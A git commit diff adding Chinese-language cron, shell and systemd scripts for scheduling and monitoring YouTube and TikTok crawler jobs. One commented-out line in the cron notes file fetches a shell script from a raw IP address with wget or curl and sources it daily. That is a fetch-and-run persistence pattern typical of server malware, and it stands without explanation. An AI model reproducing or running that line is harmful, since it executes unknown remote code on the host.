初始化提交
This commit is contained in:
0
爬虫项目的相关命令/test_yt_data_update/logs/update_yt.log
Normal file
0
爬虫项目的相关命令/test_yt_data_update/logs/update_yt.log
Normal file
62
爬虫项目的相关命令/test_yt_data_update/scripts/cron相关命令.conf
Normal file
62
爬虫项目的相关命令/test_yt_data_update/scripts/cron相关命令.conf
Normal file
@@ -0,0 +1,62 @@
|
||||
crontab -l
|
||||
|
||||
crontab -e
|
||||
|
||||
*/1 * * * * bash /data/webapps/prod_yt_search_crawler/cron_run_yt_search_crawler.sh
|
||||
|
||||
0 10 * * * /data/webapps/test_yt_data_update/scripts/run_update_yt.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt.log 2>&1
|
||||
|
||||
0 10 * * 1 /data/webapps/test_yt_data_update/scripts/run_update_yt_week.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt_week.log 2>&1
|
||||
|
||||
每10分支执行一次: */10 * * * * bash /data/webapps/yt_data_update/monitor_update_yt_day.sh
|
||||
|
||||
晚上8点执行一次: 0 20 * * * bash /data/webapps/prod_nano_crawler/cron_run_nano_crawler.sh
|
||||
|
||||
每天的 11:15 AM: 15 11 * * *
|
||||
|
||||
7 14 * * * bash /data/webapps/prod_nano_crawler/cron_run_nano_crawler.sh
|
||||
|
||||
|
||||
### @daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
|
||||
|
||||
|
||||
用 tee 重新启动(日志自动写入多个文件):
|
||||
nohup python async_yt.py | tee -a output.log > output_$(date +%Y%m%d).log 2>&1 &
|
||||
|
||||
|
||||
1、这是我的定时任务:
|
||||
0 10 * * * /data/webapps/test_yt_data_update/scripts/run_update_yt.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt.log 2>&1*
|
||||
|
||||
2、run_update_yt.shw文件:
|
||||
#!/bin/bash
|
||||
LOCKFILE="/tmp/update_yt.lock"
|
||||
LOGFILE="/data/webapps/test_yt_data_update/logs/update_yt.log"
|
||||
cd /data/webapps/test_yt_data_update/
|
||||
if [ -e "$LOCKFILE" ]; then
|
||||
echo "$(date): Task is already running, skipping." >> "$LOGFILE"
|
||||
exit 1
|
||||
fi
|
||||
touch "$LOCKFILE"
|
||||
source ~/.bashrc
|
||||
conda activate py310
|
||||
pip install -r requirements.txt
|
||||
python update_yt.py >> "$LOGFILE" 2>&1
|
||||
rm -f "$LOCKFILE"
|
||||
|
||||
3、经过一天发现有以下问题:
|
||||
3.1、通过日志 update_yt.log 发现定时任务确实10点第一次启动运行脚本成功,但是后续没每分钟都执行一次,持续了一小时,我只需要它每天10点启动一次,以下是日志
|
||||
- Active tasks: 11/12
|
||||
- Queue sizes: video=0, channel=0
|
||||
2025-04-11 10:00:06,880 - update_yt.py - INFO - Starting update tasks...
|
||||
2025-04-11 10:00:09,125 - update_yt.py - INFO - aiohttp session initialized successfully
|
||||
Fri Apr 11 10:01:01 CST 2025: Task is already running, skipping.
|
||||
Fri Apr 11 10:02:01 CST 2025: Task is already running, skipping.
|
||||
Fri Apr 11 10:03:01 CST 2025: Task is already running, skipping.
|
||||
Fri Apr 11 10:04:01 CST 2025: Task is already running, skipping.
|
||||
Fri Apr 11 10:05:01 CST 2025: Task is already running, skipping.
|
||||
|
||||
3.2、定时任务本身的日志cron_update_yt.log 太冗杂,且没有时间戳,分不清是什么时间的cron,也没有开始结束之类的日志提示,以下是日志,而且它每分钟执行一次导致它日志又60次相同的
|
||||
Requirement already satisfied: PyMySQL==1.1.1 in /root/miniconda3/envs/py310/lib/python3.10/site-packages (from -r requirements.txt (line 13)) (1.1.1)
|
||||
Requirement already satisfied: python-dotenv==1.0.1 in /root/miniconda3/envs/py310/lib/python3.10/site-packages (from -r requirements.txt (line 14)) (1.0.1)
|
||||
Requirement already satisfied: typing_extensions==4.12.2 in /root/miniconda3/envs/py310/lib/python3.10/site-packages (from -r requirements.txt (line 15)) (4.12.2)
|
||||
/data/webapps/test_yt_data_update/scripts/run_update_yt.sh: line 15: 30412 Killed python update_yt.py >> "$LOGFILE" 2>&1
|
||||
35
爬虫项目的相关命令/test_yt_data_update/scripts/run_update_week_yt.sh
Normal file
35
爬虫项目的相关命令/test_yt_data_update/scripts/run_update_week_yt.sh
Normal file
@@ -0,0 +1,35 @@
|
||||
#!/bin/bash
|
||||
LOCKFILE="/tmp/update_yt_week.lock"
|
||||
LOGFILE="/data/webapps/yt_data_update/logs/update_yt_week.log"
|
||||
CRONLOG="/data/webapps/yt_data_update/logs/cron_update_yt_week.log"
|
||||
|
||||
{
|
||||
echo "[$(date '+%F %T')] ==== Cron 任务启动 ===="
|
||||
|
||||
cd /data/webapps/yt_data_update/ || {
|
||||
echo "[$(date '+%F %T')] 未能进入目标目录"
|
||||
exit 1
|
||||
}
|
||||
|
||||
if [ -e "$LOCKFILE" ]; then
|
||||
echo "[$(date '+%F %T')] 任务已经在运行, 跳过。"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
touch "$LOCKFILE"
|
||||
|
||||
source ~/.bashrc
|
||||
conda activate py310
|
||||
|
||||
echo "[$(date '+%F %T')] 安装依赖中..."
|
||||
pip install -r requirements.txt
|
||||
|
||||
echo "[$(date '+%F %T')] 运行周更脚本:update_yt_week.py..."
|
||||
python update_yt.py >> "$LOGFILE" 2>&1
|
||||
|
||||
echo "[$(date '+%F %T')] 任务完成."
|
||||
rm -f "$LOCKFILE"
|
||||
echo "[$(date '+%F %T')] ==== Cron 任务结束 ===="
|
||||
} >> "$CRONLOG" 2>&1
|
||||
|
||||
|
||||
48
爬虫项目的相关命令/test_yt_data_update/scripts/run_update_yt.sh
Normal file
48
爬虫项目的相关命令/test_yt_data_update/scripts/run_update_yt.sh
Normal file
@@ -0,0 +1,48 @@
|
||||
#!/bin/bash
|
||||
LOCKFILE="/tmp/update_yt.lock"
|
||||
LOGFILE="/data/webapps/test_yt_data_update/logs/update_yt.log"
|
||||
CRONLOG="/data/webapps/test_yt_data_update/logs/cron_update_yt.log"
|
||||
|
||||
{
|
||||
echo "[$(date '+%F %T')] ==== Cron 任务启动 ===="
|
||||
|
||||
cd /data/webapps/test_yt_data_update/ || {
|
||||
echo "[$(date '+%F %T')] 未能进入目标目录"
|
||||
exit 1
|
||||
}
|
||||
|
||||
if [ -e "$LOCKFILE" ]; then
|
||||
echo "[$(date '+%F %T')] 任务已经在运行, 跳过。"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
touch "$LOCKFILE"
|
||||
|
||||
source ~/.bashrc
|
||||
conda activate py310
|
||||
|
||||
echo "[$(date '+%F %T')] 安装依赖中..."
|
||||
pip install -r requirements.txt
|
||||
|
||||
echo "[$(date '+%F %T')] 运行日更脚本:update_yt.py..."
|
||||
python update_yt.py >> "$LOGFILE" 2>&1
|
||||
|
||||
echo "[$(date '+%F %T')] 任务完成."
|
||||
rm -f "$LOCKFILE"
|
||||
echo "[$(date '+%F %T')] ==== Cron 任务结束 ===="
|
||||
} >> "$CRONLOG" 2>&1
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -0,0 +1,52 @@
|
||||
#!/bin/bash
|
||||
|
||||
# ========== 配置路径 ==========
|
||||
LOCKFILE="/tmp/main_py.lock"
|
||||
PROJECT_DIR="/data/webapps/prod_nano_crawler"
|
||||
LOGFILE="$PROJECT_DIR/logs/nano_crawler.log"
|
||||
CRONLOG="$PROJECT_DIR/logs/cron_nano_crawler.log"
|
||||
|
||||
# ========== 开始记录 cron 执行日志 ==========
|
||||
{
|
||||
echo "[$(date '+%F %T')] ==== 定时任务开始 ===="
|
||||
|
||||
# ========== 切换目录 ==========
|
||||
cd "$PROJECT_DIR" || {
|
||||
echo "[$(date '+%F %T')] ❌ 无法进入项目目录:$PROJECT_DIR"
|
||||
exit 1
|
||||
}
|
||||
|
||||
# ========== 判断是否已有任务在运行 ==========
|
||||
if [ -e "$LOCKFILE" ]; then
|
||||
echo "[$(date '+%F %T')] ⚠️ 检测到已有任务在运行,跳过此次执行"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# ========== 创建锁文件 ==========
|
||||
touch "$LOCKFILE"
|
||||
|
||||
# ========== 加载环境变量,激活 conda 环境 ==========
|
||||
source ~/.bashrc
|
||||
conda activate py310
|
||||
|
||||
# ========== 安装依赖 ==========
|
||||
echo "[$(date '+%F %T')] 📦 安装依赖中..."
|
||||
pip install -r requirements.txt
|
||||
|
||||
# ========== 执行 Python 脚本 ==========
|
||||
echo "[$(date '+%F %T')] 🚀 开始执行 main.py ..."
|
||||
python main.py > "$LOGFILE" 2>&1
|
||||
status=$?
|
||||
|
||||
# ========== 判断执行状态 ==========
|
||||
if [ $status -ne 0 ]; then
|
||||
echo "[$(date '+%F %T')] ❗ 脚本执行异常,退出码:$status"
|
||||
else
|
||||
echo "[$(date '+%F %T')] ✅ 脚本执行完成"
|
||||
fi
|
||||
|
||||
# ========== 清理锁文件 ==========
|
||||
rm -f "$LOCKFILE"
|
||||
|
||||
echo "[$(date '+%F %T')] ==== 定时任务结束 ===="
|
||||
} > "$CRONLOG" 2>&1
|
||||
@@ -0,0 +1,52 @@
|
||||
#!/bin/bash
|
||||
|
||||
========== 配置路径 ==========
|
||||
LOCKFILE="/tmp/async_yt_py.lock"
|
||||
PROJECT_DIR="/data/webapps/prod_yt_search_crawler"
|
||||
LOGFILE="$PROJECT_DIR/output.log"
|
||||
CRONLOG="$PROJECT_DIR/cron_output.log"
|
||||
|
||||
========== 开始记录 cron 执行日志 ==========
|
||||
{
|
||||
echo "[$(date '+%F %T')] ==== 定时任务开始 ===="
|
||||
|
||||
========== 切换目录 ==========
|
||||
cd "$PROJECT_DIR" || {
|
||||
echo "[$(date '+%F %T')] ❌ 无法进入项目目录:$PROJECT_DIR"
|
||||
exit 1
|
||||
}
|
||||
|
||||
========== 判断是否已有任务在运行 ==========
|
||||
if [ -e "$LOCKFILE" ]; then
|
||||
echo "[$(date '+%F %T')] ⚠️ 检测到已有任务在运行,跳过此次执行"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
========== 创建锁文件 ==========
|
||||
touch "$LOCKFILE"
|
||||
|
||||
========== 加载环境变量,激活 conda 环境 ==========
|
||||
source ~/.bashrc
|
||||
conda activate py310
|
||||
|
||||
========== 安装依赖 ==========
|
||||
echo "[$(date '+%F %T')] 📦 安装依赖中..."
|
||||
pip install -r requirements.txt
|
||||
|
||||
========== 执行 Python 脚本 ==========
|
||||
echo "[$(date '+%F %T')] 🚀 开始执行 async_yt.py ..."
|
||||
python async_yt.py > "$LOGFILE" 2>&1
|
||||
status=$?
|
||||
|
||||
========== 判断执行状态 ==========
|
||||
if [ $status -ne 0 ]; then
|
||||
echo "[$(date '+%F %T')] ❗ 脚本执行异常,退出码:$status"
|
||||
else
|
||||
echo "[$(date '+%F %T')] ✅ 脚本执行完成"
|
||||
fi
|
||||
|
||||
========== 清理锁文件 ==========
|
||||
rm -f "$LOCKFILE"
|
||||
|
||||
echo "[$(date '+%F %T')] ==== 定时任务结束 ===="
|
||||
} >> "$CRONLOG" 2>&1
|
||||
@@ -0,0 +1,52 @@
|
||||
#!/bin/bash
|
||||
|
||||
# ========== 配置路径 ==========
|
||||
LOCKFILE="/tmp/update_yt.lock"
|
||||
PROJECT_DIR="/data/webapps/test_yt_data_update"
|
||||
LOGFILE="$PROJECT_DIR/logs/update_yt.log"
|
||||
CRONLOG="$PROJECT_DIR/logs/cron_update_yt.log"
|
||||
|
||||
# ========== 开始记录 cron 执行日志 ==========
|
||||
{
|
||||
echo "[$(date '+%F %T')] ==== 定时任务开始 ===="
|
||||
|
||||
# ========== 切换目录 ==========
|
||||
cd "$PROJECT_DIR" || {
|
||||
echo "[$(date '+%F %T')] ❌ 无法进入项目目录:$PROJECT_DIR"
|
||||
exit 1
|
||||
}
|
||||
|
||||
# ========== 判断是否已有任务在运行 ==========
|
||||
if [ -e "$LOCKFILE" ]; then
|
||||
echo "[$(date '+%F %T')] ⚠️ 检测到已有任务在运行,跳过此次执行"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# ========== 创建锁文件 ==========
|
||||
touch "$LOCKFILE"
|
||||
|
||||
# ========== 加载环境变量,激活 conda 环境 ==========
|
||||
source ~/.bashrc
|
||||
conda activate py310
|
||||
|
||||
# ========== 安装依赖 ==========
|
||||
echo "[$(date '+%F %T')] 📦 安装依赖中..."
|
||||
pip install -r requirements.txt
|
||||
|
||||
# ========== 执行 Python 脚本 ==========
|
||||
echo "[$(date '+%F %T')] 🚀 开始执行 update_yt.py ..."
|
||||
python update_yt.py >> "$LOGFILE" 2>&1
|
||||
status=$?
|
||||
|
||||
# ========== 判断执行状态 ==========
|
||||
if [ $status -ne 0 ]; then
|
||||
echo "[$(date '+%F %T')] ❗ 脚本执行异常,退出码:$status"
|
||||
else
|
||||
echo "[$(date '+%F %T')] ✅ 脚本执行完成"
|
||||
fi
|
||||
|
||||
# ========== 清理锁文件 ==========
|
||||
rm -f "$LOCKFILE"
|
||||
|
||||
echo "[$(date '+%F %T')] ==== 定时任务结束 ===="
|
||||
} >> "$CRONLOG" 2>&1
|
||||
19
爬虫项目的相关命令/test_yt_data_update/systemd/yt_update.service
Normal file
19
爬虫项目的相关命令/test_yt_data_update/systemd/yt_update.service
Normal file
@@ -0,0 +1,19 @@
|
||||
[Unit]
|
||||
Description=Daily update_yt.py script
|
||||
After=network.target
|
||||
|
||||
[Service]
|
||||
Type=oneshot
|
||||
WorkingDirectory=/data/webapps/test_yt_data_update
|
||||
ExecStart=/bin/bash -c '
|
||||
. ~/.bashrc &&
|
||||
conda activate py310 &&
|
||||
/usr/bin/flock -n /tmp/update_yt.lock \
|
||||
python update_yt.py >> logs/update_yt.log 2>&1
|
||||
'
|
||||
StandardOutput=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt.log
|
||||
StandardError=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt.log
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
||||
11
爬虫项目的相关命令/test_yt_data_update/systemd/yt_update.timer
Normal file
11
爬虫项目的相关命令/test_yt_data_update/systemd/yt_update.timer
Normal file
@@ -0,0 +1,11 @@
|
||||
[Unit]
|
||||
Description=Run update_yt.py daily script at 10:00
|
||||
|
||||
[Timer]
|
||||
OnCalendar=*-*-* 10:00:00
|
||||
OnUnitInactiveSec=2h
|
||||
Persistent=true
|
||||
Unit=yt_update.service
|
||||
|
||||
[Install]
|
||||
WantedBy=timers.target
|
||||
15
爬虫项目的相关命令/test_yt_data_update/systemd/yt_update_week.service
Normal file
15
爬虫项目的相关命令/test_yt_data_update/systemd/yt_update_week.service
Normal file
@@ -0,0 +1,15 @@
|
||||
[Unit]
|
||||
Description=Weekly update_yt_week.py script
|
||||
After=network.target
|
||||
|
||||
[Service]
|
||||
Type=oneshot
|
||||
WorkingDirectory=/data/webapps/test_yt_data_update
|
||||
ExecStart=/bin/bash -c '
|
||||
. ~/.bashrc &&
|
||||
conda activate py310 &&
|
||||
/usr/bin/flock -n /tmp/update_yt_week.lock \
|
||||
python update_yt_week.py >> logs/update_yt_week.log 2>&1
|
||||
'
|
||||
StandardOutput=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt_week.log
|
||||
StandardError=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt_week.log
|
||||
11
爬虫项目的相关命令/test_yt_data_update/systemd/yt_update_week.timer
Normal file
11
爬虫项目的相关命令/test_yt_data_update/systemd/yt_update_week.timer
Normal file
@@ -0,0 +1,11 @@
|
||||
[Unit]
|
||||
Description=Run update_yt_week.py weekly script at 10:00 every Monday
|
||||
|
||||
[Timer]
|
||||
OnCalendar=Mon *-*-* 10:00:00
|
||||
OnUnitInactiveSec=2h
|
||||
Persistent=true
|
||||
Unit=yt_update_week.service
|
||||
|
||||
[Install]
|
||||
WantedBy=timers.target
|
||||
70
爬虫项目的相关命令/test_yt_data_update/systemd/相关管理命令.conf
Normal file
70
爬虫项目的相关命令/test_yt_data_update/systemd/相关管理命令.conf
Normal file
@@ -0,0 +1,70 @@
|
||||
# 查看 timer 状态
|
||||
systemctl list-timers | grep yt_update
|
||||
|
||||
# 查看 timer 的详细计划
|
||||
systemctl status yt_update.timer
|
||||
|
||||
# 查看是否成功调用了对应的 service
|
||||
journalctl -u yt_update.service
|
||||
|
||||
|
||||
|
||||
# 查看所有激活的定时器
|
||||
systemctl list-timers
|
||||
# 查看特定 timer 状态
|
||||
systemctl status yt_update.timer
|
||||
# 手动触发任务
|
||||
systemctl start yt_update.service
|
||||
# 查看任务日志(systemd 层)
|
||||
tail -f logs/systemd_update_yt.log
|
||||
# 查看脚本输出日志
|
||||
tail -f logs/update_yt.log
|
||||
# 禁用任务
|
||||
systemctl disable --now yt_update.timer
|
||||
|
||||
|
||||
|
||||
|
||||
#--------------------------------------------------------------------------
|
||||
# 文件部署 & 启动命令
|
||||
# 将 4 个文件放到 /etc/systemd/system/
|
||||
sudo cp yt_update* /etc/systemd/system/
|
||||
sudo cp yt_update_week* /etc/systemd/system/
|
||||
|
||||
# 刷新 systemd 配置
|
||||
sudo systemctl daemon-reload
|
||||
|
||||
# 启动并开机自启 timer
|
||||
sudo systemctl enable --now yt_update.timer
|
||||
sudo systemctl enable --now yt_update_week.timer
|
||||
|
||||
|
||||
|
||||
#--------------------------------------------------------------------------
|
||||
|
||||
#使 systemd 服务和定时器生效
|
||||
#重新加载 systemd 配置,以使新的服务和定时器生效:
|
||||
sudo systemctl daemon-reload
|
||||
|
||||
#启动并启用定时器:
|
||||
sudo systemctl enable yt_update.timer
|
||||
sudo systemctl start yt_update.timer
|
||||
|
||||
sudo systemctl enable yt_update_week.timer
|
||||
sudo systemctl start yt_update_week.timer
|
||||
|
||||
# 检查定时任务状态
|
||||
#查看 yt_update.timer 和 yt_update_week.timer 的状态,确保它们正常运行:
|
||||
sudo systemctl status yt_update.timer
|
||||
sudo systemctl status yt_update_week.timer
|
||||
|
||||
# 查看日志
|
||||
update_yt.py 脚本的日志会保存在 /data/webapps/test_yt_data_update/logs/update_yt.log。
|
||||
update_yt_week.py 脚本的日志会保存在
|
||||
/data/webapps/test_yt_data_update/logs/update_yt_week.log
|
||||
定时任务本身的日志(包括 yt_update.service 和 yt_update_week.service 启动信息)会记录在
|
||||
/data/webapps/test_yt_data_update/logs/service_log.txt 中。
|
||||
|
||||
#你可以通过 journalctl 查看 systemd 服务的日志,也可以使用 cat 或其他命令来查看具体的脚本日志。
|
||||
journalctl -u yt_update.service
|
||||
journalctl -u yt_update_week.service
|
||||
83
爬虫项目的相关命令/tk_region.conf
Normal file
83
爬虫项目的相关命令/tk_region.conf
Normal file
@@ -0,0 +1,83 @@
|
||||
# /data/sh/start_tk_regio.sh
|
||||
|
||||
# crontab -e
|
||||
# 0 9 * * * /data/sh/start_tk_regio.sh
|
||||
|
||||
#!/bin/bash
|
||||
|
||||
# 定义变量
|
||||
APP_DIR="/data/webapps/test_tk_region"
|
||||
LOG_FILE="$APP_DIR/sh.log"
|
||||
PYTHON_SCRIPT="tk_region.py"
|
||||
MAX_ATTEMPTS=10
|
||||
WAIT_TIME=600 # 10分钟,单位为秒
|
||||
|
||||
# 记录日志函数
|
||||
log() {
|
||||
echo "[$(date +'%Y-%m-%d %H:%M:%S')] $1" >> "$LOG_FILE"
|
||||
}
|
||||
|
||||
# 切换到应用目录
|
||||
log "==========="
|
||||
log "切换到应用目录: $APP_DIR"
|
||||
cd "$APP_DIR" || {
|
||||
log "无法切换到应用目录 $APP_DIR,脚本退出"
|
||||
exit 1
|
||||
}
|
||||
|
||||
# 检查是否有旧进程在运行
|
||||
attempt=1
|
||||
while [ $attempt -le $MAX_ATTEMPTS ]; do
|
||||
# 查找正在运行的Python脚本进程
|
||||
log "第 $attempt 次检查是否有旧进程在运行..."
|
||||
pid=$(ps aux | grep "$PYTHON_SCRIPT" | grep -v grep | awk '{print $2}')
|
||||
|
||||
if [ -z "$pid" ]; then
|
||||
log "未发现运行中的 $PYTHON_SCRIPT 进程,准备启动新进程"
|
||||
break
|
||||
else
|
||||
log "发现运行中的进程,PID: $pid"
|
||||
if [ $attempt -eq $MAX_ATTEMPTS ]; then
|
||||
log "已达到最大等待次数 ($MAX_ATTEMPTS),仍有进程在运行,放弃启动"
|
||||
exit 1
|
||||
fi
|
||||
log "等待 $((WAIT_TIME/60)) 分钟后再次检查..."
|
||||
sleep $WAIT_TIME
|
||||
attempt=$((attempt + 1))
|
||||
fi
|
||||
done
|
||||
|
||||
# 激活路径
|
||||
log "激活conda路径"
|
||||
source ~/.bashrc || {
|
||||
log "激活conda激活路径失败"
|
||||
exit 1
|
||||
}
|
||||
|
||||
# 激活环境
|
||||
log "激活conda环境 py310"
|
||||
conda activate py310 || {
|
||||
log "激活conda环境失败"
|
||||
exit 1
|
||||
}
|
||||
|
||||
log "激活虚拟环境"
|
||||
source venv/bin/activate || {
|
||||
log "激活虚拟环境失败"
|
||||
exit 1
|
||||
}
|
||||
|
||||
# 安装依赖
|
||||
log "安装依赖包"
|
||||
pip install -r requirements.txt || {
|
||||
log "安装依赖包失败"
|
||||
exit 1
|
||||
}
|
||||
|
||||
# 启动Python脚本
|
||||
log "启动 $PYTHON_SCRIPT 脚本"
|
||||
nohup python "$PYTHON_SCRIPT" > output.log 2>&1 &
|
||||
pid=$!
|
||||
log "$PYTHON_SCRIPT 已启动,PID: $pid"
|
||||
|
||||
log "脚本执行完成"
|
||||
73
爬虫项目的相关命令/yt_data_update自动检测日更周更脚本/monitor_update_yt_day.sh
Normal file
73
爬虫项目的相关命令/yt_data_update自动检测日更周更脚本/monitor_update_yt_day.sh
Normal file
@@ -0,0 +1,73 @@
|
||||
#!/bin/bash
|
||||
|
||||
# 配置区域
|
||||
PROJECT_DIR="/data/webapps/yt_data_update"
|
||||
SCRIPT_NAME="update_yt.py"
|
||||
START_SCRIPT="$PROJECT_DIR/run_update_yt_day.sh"
|
||||
LOG_DIR="$PROJECT_DIR/logs"
|
||||
TODAY=$(date +%F)
|
||||
LOG_FILE="$LOG_DIR/monitor/monitor_day_$TODAY.log"
|
||||
MAX_RETRY=3
|
||||
SLEEP_BETWEEN_CHECK=10
|
||||
|
||||
# 保证日志目录存在
|
||||
mkdir -p "$LOG_DIR"
|
||||
|
||||
# 计数器文件
|
||||
COUNT_FILE="$LOG_DIR/monitor/monitor_day_count_$TODAY.txt"
|
||||
[ ! -f "$COUNT_FILE" ] && echo 0 > "$COUNT_FILE"
|
||||
COUNT=$(cat "$COUNT_FILE")
|
||||
COUNT=$((COUNT + 1))
|
||||
echo $COUNT > "$COUNT_FILE"
|
||||
|
||||
log() {
|
||||
echo "$(date '+%F %T') [第 $COUNT 次执行检查] $1" >> "$LOG_FILE"
|
||||
}
|
||||
|
||||
# 检查是否运行: 匹配到进程:返回状态码 0;匹配不到进程:返回退出状态码:1
|
||||
is_running() {
|
||||
pgrep -f "python $SCRIPT_NAME" > /dev/null 2>&1
|
||||
return $?
|
||||
}
|
||||
|
||||
# 尝试启动
|
||||
start_script() {
|
||||
log "尝试启动脚本..."
|
||||
bash "$START_SCRIPT"
|
||||
sleep 1
|
||||
# 再次检测
|
||||
if is_running; then
|
||||
PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
|
||||
echo "$PID" > "$PROJECT_DIR/update_yt_day.pid"
|
||||
log "启动成功,PID=$PID"
|
||||
return 0
|
||||
else
|
||||
log "启动失败"
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
# 主流程
|
||||
if is_running; then
|
||||
PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
|
||||
log "脚本已在运行中,PID=$PID"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
log "检测到脚本未运行,开始重启流程..."
|
||||
|
||||
RETRY=0
|
||||
while [ $RETRY -lt $MAX_RETRY ]; do
|
||||
start_script
|
||||
sleep $SLEEP_BETWEEN_CHECK
|
||||
if is_running; then
|
||||
log "第 $((RETRY+1)) 次尝试启动成功。"
|
||||
exit 0
|
||||
else
|
||||
log "第 $((RETRY+1)) 次尝试启动失败。"
|
||||
fi
|
||||
RETRY=$((RETRY + 1))
|
||||
done
|
||||
|
||||
log "连续 $MAX_RETRY 次重启失败,放弃本轮重试。"
|
||||
exit 1
|
||||
73
爬虫项目的相关命令/yt_data_update自动检测日更周更脚本/monitor_update_yt_week.sh
Normal file
73
爬虫项目的相关命令/yt_data_update自动检测日更周更脚本/monitor_update_yt_week.sh
Normal file
@@ -0,0 +1,73 @@
|
||||
#!/bin/bash
|
||||
|
||||
# 配置区域
|
||||
PROJECT_DIR="/data/webapps/yt_data_update"
|
||||
SCRIPT_NAME="update_yt_week.py"
|
||||
START_SCRIPT="$PROJECT_DIR/run_update_yt_week.sh"
|
||||
LOG_DIR="$PROJECT_DIR/logs"
|
||||
TODAY=$(date +%F)
|
||||
LOG_FILE="$LOG_DIR/monitor/monitor_$TODAY.log"
|
||||
MAX_RETRY=3
|
||||
SLEEP_BETWEEN_CHECK=10
|
||||
|
||||
# 保证日志目录存在
|
||||
mkdir -p "$LOG_DIR"
|
||||
|
||||
# 计数器文件
|
||||
COUNT_FILE="$LOG_DIR/monitor/monitor_count_$TODAY.txt"
|
||||
[ ! -f "$COUNT_FILE" ] && echo 0 > "$COUNT_FILE"
|
||||
COUNT=$(cat "$COUNT_FILE")
|
||||
COUNT=$((COUNT + 1))
|
||||
echo $COUNT > "$COUNT_FILE"
|
||||
|
||||
log() {
|
||||
echo "$(date '+%F %T') [第 $COUNT 次执行检查] $1" >> "$LOG_FILE"
|
||||
}
|
||||
|
||||
# 检查是否运行: 匹配到进程:返回状态码 0;匹配不到进程:返回退出状态码:1
|
||||
is_running() {
|
||||
pgrep -f "python $SCRIPT_NAME" > /dev/null 2>&1
|
||||
return $?
|
||||
}
|
||||
|
||||
# 尝试启动
|
||||
start_script() {
|
||||
log "尝试启动脚本..."
|
||||
bash "$START_SCRIPT"
|
||||
sleep 1
|
||||
# 再次检测
|
||||
if is_running; then
|
||||
PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
|
||||
echo "$PID" > "$PROJECT_DIR/update_yt_week.pid"
|
||||
log "启动成功,PID=$PID"
|
||||
return 0
|
||||
else
|
||||
log "启动失败"
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
# 主流程
|
||||
if is_running; then
|
||||
PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
|
||||
log "脚本已在运行中,PID=$PID"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
log "检测到脚本未运行,开始重启流程..."
|
||||
|
||||
RETRY=0
|
||||
while [ $RETRY -lt $MAX_RETRY ]; do
|
||||
start_script
|
||||
sleep $SLEEP_BETWEEN_CHECK
|
||||
if is_running; then
|
||||
log "第 $((RETRY+1)) 次尝试启动成功。"
|
||||
exit 0
|
||||
else
|
||||
log "第 $((RETRY+1)) 次尝试启动失败。"
|
||||
fi
|
||||
RETRY=$((RETRY + 1))
|
||||
done
|
||||
|
||||
log "连续 $MAX_RETRY 次重启失败,放弃本轮重试。"
|
||||
exit 1
|
||||
8
爬虫项目的相关命令/yt_data_update自动检测日更周更脚本/run_update_yt_day.sh
Normal file
8
爬虫项目的相关命令/yt_data_update自动检测日更周更脚本/run_update_yt_day.sh
Normal file
@@ -0,0 +1,8 @@
|
||||
#!/bin/bash
|
||||
source ~/.bashrc
|
||||
conda activate py310
|
||||
cd /data/webapps/yt_data_update/
|
||||
pip install -r requirements.txt
|
||||
python update_yt.py >> logs/yt_up_date_day_outup/output_day_$(date +%F).log 2>&1 &
|
||||
|
||||
|
||||
8
爬虫项目的相关命令/yt_data_update自动检测日更周更脚本/run_update_yt_week.sh
Normal file
8
爬虫项目的相关命令/yt_data_update自动检测日更周更脚本/run_update_yt_week.sh
Normal file
@@ -0,0 +1,8 @@
|
||||
#!/bin/bash
|
||||
source ~/.bashrc
|
||||
conda activate py310
|
||||
cd /data/webapps/yt_data_update/
|
||||
pip install -r requirements.txt
|
||||
python update_yt_week.py >> logs/yt_up_date_week_outup/output_week_$(date +%F).log 2>&1 &
|
||||
|
||||
|
||||
43
爬虫项目的相关命令/相关命令.conf
Normal file
43
爬虫项目的相关命令/相关命令.conf
Normal file
@@ -0,0 +1,43 @@
|
||||
nohup /data/webapps/test_check_tiktok_account/venv/bin/python check_account.py > output.log 2>&1
|
||||
|
||||
|
||||
nohup /data/webapps/test_yt_search_crawler/venv/bin/python async_yt.py > output.log 2>&1
|
||||
|
||||
|
||||
nohup python async_yt.py > output.log 2>&1 &
|
||||
|
||||
|
||||
|
||||
nohup env PYTHONPATH=/data/webapps/test_influencer_search_agent python -m dialogue.influencer_search > /data/webapps/test_influencer_search_agent/log/test_influencer_search_20250324.log 2>&1 &
|
||||
|
||||
|
||||
ps axjf | grep dialogue.influencer_search
|
||||
|
||||
|
||||
ps axjf | grep async_yt.py
|
||||
|
||||
ps aux | grep async_yt.py
|
||||
|
||||
|
||||
|
||||
|
||||
ps axjf|grep check_account.py
|
||||
|
||||
ps axjf | grep async_tk_crawler.py
|
||||
|
||||
|
||||
|
||||
ps axjf|grep async_yt.py|grep -v grep |awk '{print "kill -9 ",$2}'|sh -
|
||||
|
||||
|
||||
启动脚本
|
||||
cd /data/webapps/yt_search_crawler
|
||||
source venv/bin/activate
|
||||
nohup python async_yt.py > output.log 2>&1 &
|
||||
|
||||
|
||||
|
||||
|
||||
通过 exec -a 给进程“改名”
|
||||
nohup bash -c "exec -a yt01 python async_yt.py" > output_01.log 2>&1 &
|
||||
nohup bash -c "exec -a yt02 python async_yt.py" > output_02.log 2>&1 &
|
||||
